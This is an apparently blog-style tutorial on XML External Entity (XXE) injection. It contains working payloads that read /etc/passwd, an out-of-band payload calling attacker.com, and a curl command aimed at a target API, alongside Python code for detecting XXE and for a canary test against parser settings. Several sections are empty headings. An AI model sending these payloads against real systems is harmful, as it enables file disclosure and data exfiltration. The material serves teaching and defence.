What is XXE?

XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser resolves external entities declared in user-supplied XML. If such input is parsed without disabling external entity resolution, attackers may exploit it to:

Types of XXE Attacks

1. File Disclosure

Leaking sensitive files like /etc/passwd or application configs.

2. SSRF via External Entities

Triggering internal network requests by pointing a SYSTEM identifier in the DOCTYPE at an internal URL.

3. Out-of-Band (OOB) Exploitation

Exfiltrating data via DNS lookups, HTTP requests, or other external callbacks (useful when the response does not echo the entity content, i.e. blind XXE).
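The three attack types above differ only in where the external identifier points, so a request-side detector can classify a payload by the URI it declares. The following is an added example (not code from the original page): a scanner that flags ENTITY and DOCTYPE declarations carrying SYSTEM/PUBLIC identifiers in XML request bodies and labels them as file disclosure, SSRF or out-of-band. The sample bodies, the hostnames (internal-service.local, attacker.example) and the "internal host" heuristic are constructed assumptions for illustration; tune the heuristic to your own address space.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Constructed sample request bodies: one per attack type, plus a benign document,
# an external DTD reference and a DTD with only internal entities.
SAMPLE_BODIES = {
    "benign": '<?xml version="1.0"?><order><id>42</id></order>',
    "file_disclosure": (
        '<?xml version="1.0" ?>\n'
        '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
        '<root>&xxe;</root>'
    ),
    "ssrf": '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal-service.local/"> ]><foo>&xxe;</foo>',
    "oob": '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.example/xxe.txt"> ]><foo>&xxe;</foo>',
    "external_dtd": '<!DOCTYPE note SYSTEM "http://attacker.example/evil.dtd"><note/>',
    "dtd_no_external": '<!DOCTYPE note [ <!ENTITY hi "hello"> ]><note>&hi;</note>',
}

# ENTITY (general or parameter, i.e. with a leading %) and DOCTYPE declarations
# that carry a SYSTEM or PUBLIC external identifier. Case-insensitive on purpose:
# strict XML requires uppercase keywords, but a detector should not depend on it.
EXTERNAL_REF_RE = re.compile(
    r'<!(?P<decl>ENTITY|DOCTYPE)\s+(?:%\s+)?(?P<name>[\w.\-]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+["\'][^"\']*["\'])\s+["\'](?P<uri>[^"\']*)["\']',
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


@dataclass
class Finding:
    kind: str                   # file_disclosure | ssrf | oob | dtd_present
    declaration: Optional[str]  # ENTITY or DOCTYPE
    uri: Optional[str]


def is_internal_host(host: str) -> bool:
    """Assumed heuristic: private/loopback/link-local IPs and single-label,
    .local or .internal names count as internal. Adjust for your network."""
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_private or ip.is_loopback or ip.is_link_local
    except ValueError:
        pass
    h = host.lower()
    return h == "localhost" or h.endswith((".local", ".internal")) or "." not in h


def classify_uri(uri: str) -> str:
    """Map an external identifier to the attack type it would enable."""
    parsed = urlparse(uri.strip())
    scheme = parsed.scheme.lower()
    if scheme in ("", "file"):          # local file or relative path
        return "file_disclosure"
    if is_internal_host(parsed.hostname or ""):
        return "ssrf"
    return "oob"                        # anything reaching an external host


def scan_body(body: str) -> List[Finding]:
    """Return the XXE indicators found in one XML request body (empty if clean)."""
    findings = [
        Finding(classify_uri(m.group("uri")), m.group("decl").upper(), m.group("uri"))
        for m in EXTERNAL_REF_RE.finditer(body)
    ]
    if not findings and DOCTYPE_RE.search(body):
        # A DTD without external references is not an attack by itself, but most
        # applications never need one, so it is worth logging or blocking.
        findings.append(Finding("dtd_present", "DOCTYPE", None))
    return findings


def scan_all(bodies=SAMPLE_BODIES) -> dict:
    """Label -> list of finding kinds, for every sample body."""
    return {label: [f.kind for f in scan_body(body)] for label, body in bodies.items()}


if __name__ == "__main__":
    for label, kinds in scan_all().items():
        print(f"{label:18s} -> {kinds or ['clean']}")
```

The regex deliberately catches parameter entities (`<!ENTITY % name SYSTEM ...>`) and external DTD subsets as well as the general entities shown in this page's payloads, since all of them make the parser fetch an external resource. Running the scanner on the sample bodies labels the Step 2 payload as file disclosure, the internal URL as SSRF and the attacker-hosted URLs as out-of-band.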

Step-by-Step Exploitation Guide

🧪 Step 1: Identify XML Input

Look for places where XML is accepted. Common examples:

🛠 Step 2: Send a Test Payload

Basic test to check if the parser processes external entities:

<?xml version="1.0" ?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

📥 Step 3: Analyze the Response

If the file contents appear in the response or error, the target is vulnerable.

🌐 Step 4: Exfiltration (OOB)

Use your own server or Burp Collaborator to detect OOB requests:

<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://attacker.com/xxe.txt"> 
]>
<foo>&xxe;</foo>
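Steps 2 and 3 can be run against your own parser configuration before an attacker does, using the same payload shape pointed at a throwaway canary file rather than /etc/passwd. The block below is an added example, not code from the original page: it parses the Step 2 payload twice with Python's standard-library xml.sax, once with external general entities enabled (the misconfiguration) and once with the default, and reports what each configuration expanded. Assumed: Python 3.7.1 or later, where xml.sax leaves feature_external_ges off by default; the canary marker and temporary file are constructed.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data so we can see exactly what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self) -> str:
        return "".join(self.chunks).strip()


def parse_with_external_entities(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse xml_bytes with xml.sax and return the element text it produced.

    resolve_external=True reproduces the vulnerable setting (the parser fetches
    SYSTEM identifiers); False is the hardened default in Python >= 3.7.1.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def build_test_payload(file_uri: str) -> bytes:
    """Same shape as the Step 2 payload, with the SYSTEM identifier we choose."""
    return (
        '<?xml version="1.0" ?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>\n'
        '<root>&xxe;</root>'
    ).encode()


def run_canary_check() -> dict:
    """Write a canary file, parse the payload both ways, report what leaked."""
    canary = "CANARY-xxe-0123"  # constructed marker; stands in for real file content
    with tempfile.TemporaryDirectory() as tmp:
        path = Path(tmp) / "canary.txt"
        path.write_text(canary)
        payload = build_test_payload(path.as_uri())  # file:///... URI to our own file
        return {
            "canary": canary,
            "vulnerable": parse_with_external_entities(payload, resolve_external=True),
            "hardened": parse_with_external_entities(payload, resolve_external=False),
        }


if __name__ == "__main__":
    for setting, value in run_canary_check().items():
        print(f"{setting:10s}: {value!r}")
```

With the feature enabled, the canary string appears as the text of `<root>`, which is the Step 3 signal that the configuration is vulnerable; with the default, the entity reference expands to nothing and the document parses cleanly. The same canary approach applies to other parsers: if the marker shows up in the output, external entity resolution is on and must be disabled, and where DTDs are not needed at all the safest setting is to reject any document that contains a DOCTYPE.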

Real-World Exploit Example

Example using cURL against a vulnerable endpoint:

curl -X POST https://target.com/api/xml \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?>
      <!DOCTYPE root [
        <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
      <root>&xxe;</root>'

Observe the server’s response to confirm file disclosure.

πŸ” How to Prevent XXE

💡 Tips for Pentesters

📚 Recommended Tools